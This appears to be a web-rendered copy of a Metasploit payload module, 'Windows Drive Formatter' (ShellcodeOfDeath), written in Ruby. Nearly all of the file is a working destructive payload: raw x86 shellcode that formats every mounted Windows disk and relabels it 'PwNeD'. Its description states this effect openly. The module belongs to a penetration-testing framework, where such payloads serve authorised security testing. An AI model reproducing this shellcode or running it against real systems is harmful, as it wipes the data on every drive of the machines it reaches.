Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/windows/format_all_drives.rb
Views: 11765
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45###6# Shellcode Of Death7#8# Test bed:9# x86: Windows XP SP3, Windows 2003 SP2, Windows 710# x64: Windows 8.111#12###1314module MetasploitModule1516CachedSize = 3931718Rank = ManualRanking1920include Msf::Payload::Windows21include Msf::Payload::Single2223def initialize(info = {})24super(update_info(info,25'Name' => 'Windows Drive Formatter',26'Description' => %q{27This payload formats all mounted disks in Windows (aka ShellcodeOfDeath).2829After formatting, this payload sets the volume label to the string specified in30the VOLUMELABEL option. If the code is unable to access a drive for any reason,31it skips the drive and proceeds to the next volume.32},33'Author' => [ 'Ashfaq Ansari <ashfaq_ansari1989[at]hotmail.com>',34'Ruei-Min Jiang <mike820324[at]gmail.com>'35],36'License' => MSF_LICENSE,37'References' =>38[39[ 'URL', 'http://hacksys.vfreaks.com/research/shellcode-of-death.html' ],40[ 'URL', 'https://github.com/hacksysteam/ShellcodeOfDeath' ],41],42'Platform' => 'win',43'Arch' => ARCH_X86,44'Privileged' => true,45'Notes' => {'AKA' => ['ShellcodeOfDeath']}46))4748# EXITFUNC is not supported49deregister_options('EXITFUNC')5051# Register command execution options52register_options(53[54OptString.new('VOLUMELABEL', [ false, "Set the volume label", "PwNeD" ])55])56end5758def generate(_opts = {})5960volume_label = datastore['VOLUMELABEL'] || ""61encoded_volume_label = volume_label.to_s.unpack("C*").pack("v*")6263# Calculate the magic key64magic_key = encoded_volume_label.length + 286566# Actual payload67payload_data = "\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83" +68"\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c" +69"\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b" +70"\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83" +71"\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b" +72"\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4" +73"\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33" +74"\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89" +75"\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8" +76"\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf" +77"\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83" +78"\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d" +79"\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff\xd3\x8d\x86" +80# You need to adjust this. Logic: encoded_volume_label.length + 2881[magic_key].pack("C") +82"\x00\x00\x00\x50\x68\x00\x10\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50\x8d\x86\x10\x00" +83"\x00\x00\x50\x6a\x0c\x8d\x46\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00\x00\x8b\x5d\x04" +84"\xff\xd3\x89\xf9\x83\x46\x08\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8\x7d\xff\xff\xff" +85"\x5c\x00\x5c\x00\x2e\x00\x5c\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00\x54\x00\x46\x00" +86"\x53\x00\x00\x00" +87# Volume Label, default: PwNeD88encoded_volume_label +89"\x00\x00\x55\x89\xe5\x31\xc0\x40\x5d\xc2\x0c\x00"90end91end929394